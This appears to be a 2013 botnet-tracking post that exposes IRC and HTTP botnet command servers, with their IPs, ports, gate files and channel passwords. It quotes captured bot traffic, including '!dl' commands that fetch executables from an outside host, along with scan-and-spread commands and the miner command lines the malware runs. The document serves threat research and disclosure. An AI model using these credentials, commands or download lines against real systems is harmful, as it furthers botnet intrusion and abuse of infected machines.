Resolved strike-digital.info to 46.166.184.109
Server: strike-digital.info
Port: 8888
Channel: #Fenix
Channel password: nxnxnx
A betabot belonging to the same guy is hosted on the same IP.
Hosting infos: http://whois.domaintools.com/46.166.184.109
guard4you.info (Betabot http botnet hosted by ecatel.net)
Resolved guard4you.info to 80.82.66.26
Server: guard4you.info
Gate file: /customer/order.php
Alternate domains: nexusguardian.info vote4us.info meet2n8.info
This is the same idiot as this previous betabot. After three of the free domains he used were suspended due to reports (lol), he decided to try again with paid domains. He’s upgraded to four .info domains registered at namecheap, probably all
31.31.77.195 (lightaidra Router Botnet hosted in Czech Republic Hluboka Nad Vltavou Wedos Internet A.s.)
This bot infects routers. Credits to x00.
31.31.77.195:5060
Current Local Users: 2528 Max: 2534
Current Global Users: 2528 Max: 2534
Now talking in #sc4n
Topic: .sc4n->random->b root admin
Topic: Set by [infected (unknown address)] at (Mon May 06 02:31:20 2013)
#sc4n x00 @Albert-Wesker @infected
400 linux bots
http://ircqk.nixhosting.org/conf/mel
x00@x00 /tmp $ file mel
irc.antisecbrteam.tk (Dbot hosted in Brazil Sao Paulo Royalfit Comercio De Artigos Esportivos Ltda)
Resolved : [irc.antisecbrteam.tk] To [201.54.16.10]
Server: 201.54.16.10:6667
Server Password:
Username: zbotmhz
Nickname: L2-3891
Channel: #SpkB2 (Password: SpkDbot762)
Channeltopic:
Now talking in #SpkB2
Topic On: [ #SpkB2 ] [ .scan 75 1 177.x.x.x 2 1 177.x.x.x ]
Topic By: [ xHide ]
Around 110 Dbots used for VNC brute and spread
JOIN #SpkB0 SpkBot762
Now talking
e.balkrev.com (ngrBot hosted in China Changsha Chinanet Hunan Province Network)
Resolved : [e.balkrev.com] To [124.232.150.214]
Resolved : [e.balkrev.com] To [60.172.229.40]
Resolved : [e.balkrev.com] To [124.232.163.154]
Resolved : [e.balkrev.com] To [124.232.163.150]
Resolved : [e.balkrev.com] To [124.232.163.119]
TCP Traffic: e.balkrev.com:6510
PASS smart
Data received:
:Fax!Max@hub.us.com ppppmsg n[US{XPa{jikgbsd!jikgbsd@64.31.35.159 JOIN :#dpi [US{XPa{jikgbsd3a2f #dpi :!dl hxxp://146.185.246.160/dqw7.exe !dl hxxp://146.185.246.160/ups.exe !dl hxxp://146.185.246.160/43n.exe !mdns hxxp://salsayvariando.com/av.txt n[US{XPa{jikgbsd!jikgbsd@64.31. JOIN :#mss n[US{XPa{jikgbsd @ #mss so channels
were.hacked.jp (IRC botnet hosted in France Roubaix Ovh Systems)
Thanks to anonymous guy in this post for the sample
Resolved : [were.hacked.jp] To [176.31.123.56]
Server: 176.31.123.56:8782
Server Password:
Username: __x00
Nickname: {x00-00-DEU-XP-DELL-9640}
Channel: ###x00### (Password: )
Channeltopic: :.ban |.scan sshspreadscan 120 7 0 41.x.x.x
sample here
Hosting infos: http://whois.domaintools.com/176.31.123.56
208.89.209.54 (IRC botnet hosted by virpus.com)
Server: 208.89.209.54
Port: 6667
Current global users 77, max 695
Channels: #goon 3 #aryan 39 #OFFLINE#flood 1 ##yBz## 15 ##Offline## 19
Aryan bots:
Channel: #aryan
Topic for #aryan is: #OFFLINE
Topic for #aryan set by formality at Sun May 05 16:23:03 2013
Linux bots:
Channel: ##Offline##
Channel: ##yBz##
Hosting infos: http://whois.domaintools.com/208.89.209.54
betabros.in (Several http botnets hosted by hostkey.ru)
Resolved betabros.in to 146.0.78.4
Server: betabros.in
Gate file: /beta/order.php
The owner should keep a closer eye on the fake forum he set up for cover. 1071 pages of pharmacy spam and counting.
Hosting infos: http://whois.domaintools.com/146.0.78.4
EDIT: Bitcoin and litecoin mining.
macromedia.exe -a scrypt -o http://us.litecoinpool.org:9332 -u marvid.disfig -p x
shell.exe -o stratum+tcp://stratum.btcguild.com:3333 -u vapor_3 -p x
jkdef8.ws (Betabot http botnet hosted by ecatel.net)
Resolved jkdef8.ws to 94.102.51.117
Server: jkdef8.ws
Gate file: /papka/order.php
Alternate domains (currently unregistered): jkdef6.ws jkdef7.ws jkdef10.ws jkdef11.ws jkdef12.ws jkdef13.ws jkdef14.ws jkdef15.ws jkdef16.ws jkdef17.ws jkdef18.ws jkdef19.ws jkdef20.ws jkdef21.ws jkdef22.ws
Bitcoin mining info: http://pooledbits.com:8337 -u nigfinity.1 -p x
Hosting infos: http://whois.domaintools.com/94.102.51.117
msn.3utilities.com (Betabot http botnet hosted by ecatel.net)
Resolved msn.3utilities.com to 80.82.66.43
Server: msn.3utilities.com
Port: 81
Gate file: /help/order.php
Alternate domains: videoparadise.biz kittybook.biz msn1981.3utilities.com dates4you.tk
Three out of the five domains are free and easy to get suspended. Pro botherder here.
Bitcoin mining info: stratum+tcp://eu-stratum.btcguild.com:3333 -u m4tr1x_neo -p 123 -t 0 -I -3
Litecoin mining info: -a scrypt -o http://kittybook.no-ip.biz:8332 -u m4tr1x_0